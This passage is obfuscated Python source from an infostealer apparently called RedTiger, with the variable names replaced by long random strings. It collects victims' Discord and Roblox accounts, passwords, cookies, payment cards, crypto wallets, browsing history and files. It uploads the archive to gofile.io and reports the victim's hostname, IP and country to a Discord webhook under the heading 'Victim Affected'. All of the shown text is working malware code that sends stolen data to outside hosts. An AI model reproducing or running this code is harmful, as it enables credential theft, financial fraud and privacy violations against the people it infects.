        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Screenshot        : {TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_screenshot}")

    if TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"System Info       : {TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info}")

    if LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Discord Accounts  : {LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS}")

    if FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Roblox Accounts   : {FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN}")

    if KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Passwords         : {KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV}")

    if LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Cookies           : {LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ}")

    if UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Cards             : {UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY}")

    if EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Browsing History  : {EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO}")

    if ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Download History  : {ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU}")

    if SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Extentions        : {SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ}")

    if YKTYRXAWIHYOWTTJZJUCNEJKZZJGZONBBHZRINVSLNMYQNHTZHCDPVVEGMSNOGHTAPUAGFHRNLBYKBCWOVBPL != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Wallets           : {YKTYRXAWIHYOWTTJZJUCNEJKZZJGZONBBHZRINVSLNMYQNHTZHCDPVVEGMSNOGHTAPUAGFHRNLBYKBCWOVBPL}")

    if YHWJNEHXQWERJIJNULRAHBMRHZZESNGVGRYADBHWVXTQLXPORKZSSZIXRBNGFBHSRXAFJDFZVHMVDJACOUGDSWPMKHIJHHJMQXY != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Game Launchers    : {YHWJNEHXQWERJIJNULRAHBMRHZZESNGVGRYADBHWVXTQLXPORKZSSZIXRBNGFBHSRXAFJDFZVHMVDJACOUGDSWPMKHIJHHJMQXY}")
    
    if HWZMJYVZXGFOTOPTMEXEEJMNNLKWLIIFWMKUXHZQKJVIYLZBZPAEUOUWUSIEKLTRWODOFVPZSXXKBQGJKNBEUXXPYBRFJSYIAPKY != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Apps              : {HWZMJYVZXGFOTOPTMEXEEJMNNLKWLIIFWMKUXHZQKJVIYLZBZPAEUOUWUSIEKLTRWODOFVPZSXXKBQGJKNBEUXXPYBRFJSYIAPKY}")
    
    if AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW != None:
        LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN.append(f"Interesting Files : {AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW}")

IOAWKHWDHOANLTFPPJRNULBIETSKRAPNJJUFMKUYFEUFATOUGIOPGYVMXUAYNAQRWOVTGDSDRXVLPZIKIWQPEZNTEWELXUX.seek(0)

try:
    try: XJAQYXVQWCYYWMWBLDOWVXPZZWPMDJEHYOYOTESMKKMPFHPOXQBYZFGWJMOIILGDMIZZMYVWCUACDIKSURJNSRXBCBWZR = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: XJAQYXVQWCYYWMWBLDOWVXPZZWPMDJEHYOYOTESMKKMPFHPOXQBYZFGWJMOIILGDMIZZMYVWCUACDIKSURJNSRXBCBWZR = "store4"

    JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW = requests.post(
        f"https://{XJAQYXVQWCYYWMWBLDOWVXPZZWPMDJEHYOYOTESMKKMPFHPOXQBYZFGWJMOIILGDMIZZMYVWCUACDIKSURJNSRXBCBWZR}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{CPIPAHEMSCOPTKWOFWARXJCXLXTJITZDKQGUDAYVPHDWUECMQFMSGWTSUOZMQLIBPAHFUG.replace(' ', '_')}.zip", IOAWKHWDHOANLTFPPJRNULBIETSKRAPNJJUFMKUYFEUFATOUGIOPGYVMXUAYNAQRWOVTGDSDRXVLPZIKIWQPEZNTEWELXUX)}
    )

    VZEZMSCSSUHOGWSXKGKRDDPSRGSVVSAIAQIMCBWFTXLTOMTMRAVXZHLRL = JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW.json()["data"]["downloadPage"]
except Exception as e:
    VZEZMSCSSUHOGWSXKGKRDDPSRGSVVSAIAQIMCBWFTXLTOMTMRAVXZHLRL = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=SJEQUIXSZQGIZEMOAKAVWPJXJKNREYNDBIKRSHMOBUJIPQYHJOLFHMHQULVSVETKIHECFHDCPIUISQVYLHVJLNLQUTHJXTHVZMS
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {WNDEJVOECCXAEUNIUDPMQFHXYAARENRPORBUGPYZWFKDCMAHZVICFEDFCAXGWRKDLOX}
Username    : {CPIPAHEMSCOPTKWOFWARXJCXLXTJITZDKQGUDAYVPHDWUECMQFMSGWTSUOZMQLIBPAHFUG}
DisplayName : {VXDCREHDZBZZKCRGTEOYYEZJBEHLZGIBAPDJHTDNAHKQESEGTNZASECZZPLBMW}
Ip Public   : {SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO}
Ip Local    : {ZUQUPWUGSNAVDPHPJERBTLELULSUENWVRBFNKBTVWALHSMSIZHLWLPKDZHTIGEWKPBHFEPJYPNNNX}
Country     : {HSKRKXMQBZWXVPMVVQRZACTNLZMVJKMCZWZNRRXNKINTSNPXOIVMDSCEQKWWJDPBOKCTHVPO}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(LLYMKMVDFWRAGQQIRRZSCSEYPBVNJFYWVTRWIHPSFFYSFDRYLPTOCBNSCXQVCBXRAEJPJILLSSNWPDZN)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{VZEZMSCSSUHOGWSXKGKRDDPSRGSVVSAIAQIMCBWFTXLTOMTMRAVXZHLRL}"""
).set_footer(
    text=VISGTROLPYHIPVTRDLSXSCSOAAHIGDVPCCFECEHKEUCRSZEUVWEVRCVPJSJY, 
    icon_url=GSJZRMOSHSUKKUWREUPNTMMFRMYYLOZUIPXRLPMSBTISZSQPVXGF
)

try:  
    KJJEBEEIFPGJVOVKQLOKPNYKMJBJTHQVOQKPKICQBYURWWXNPRPCWDHGNPAZRTHWYUIRKYFHNSXOWWLYSZAHBLQPACML = discord.SyncWebhook.from_url(XVEQWBNFFGUOAQDLXLPPIABWSNIJPZMAHEEQYWWZTXZNBYDADDIIPUCSNOBHHEWJAADTGISMVZQQULDZDNOLZ)
    KJJEBEEIFPGJVOVKQLOKPNYKMJBJTHQVOQKPKICQBYURWWXNPRPCWDHGNPAZRTHWYUIRKYFHNSXOWWLYSZAHBLQPACML.send(embed=embed, username=LRIZKITIIEHHFBQLZUGEDICFKZTIQKBTVHZKBDJMFKLWQQVVZKXCHTAGCEZHCBPJUZYXSZAJUKIQELCTFUVCC, avatar_url=GSJZRMOSHSUKKUWREUPNTMMFRMYYLOZUIPXRLPMSBTISZSQPVXGF)
except: pass


try: threading.Thread(target=DJJIEXWKJSTPDEXSCIEYTRNCBSNDMEXTKACCXKSMWSHIWBRVADUSNOQCOLAVUVTCJNFDPMIUP).start()
except: pass
try: threading.Thread(target=FNQYOCCWVBFHTHNQFKTTYXRUNJBHAJJMZXOCWIIUMEUZAOZFWNMMFBMVOOONQPKULSAPQMFMIJKUWTUMKPUZKU).start()
except: pass
try: threading.Thread(target=ADRCGZLCXXUSDLVJZJOTPAKJRWPELSHJIALBECLDRSPFNXFUTQOV).start()
except: pass
try: threading.Thread(target=DJRHHOHGCSPYBIXYSTQVKDNCGGSXVYJNZYYYGUZFXNLROVLIPTILD).start()
except: pass
try: threading.Thread(target=QLYFPMDLLQLTZFVBJAECRVNWSUAJKRJUBQBMKICONOZAUMXDCTUB).start()
except: pass
try: threading.Thread(target=MNPQXJAGXZBWLUJPROTJAAFXUPMCUOBURLJWXBCSRCGTLNXHELVXDVPKDMNMHIHJQIIFVYZVTWQONVMQMPXLPZENT).start()
except: pass
try: threading.Thread(target=EFXLQTPGMZWKEPOMQPZKGWSAMEZGAOPLIMLMHCKWRLWDOSCHQCRFHH).start()
except: pass
try: threading.Thread(target=KJAXWTWTTDRVFUURDOILKHQKTJCICNYNTEHUJYUEHYMTWTLWYKKEYKAIPHGWROKQHUDAZSWRENELFGQWXILDKPAJPUER).start()
except: pass
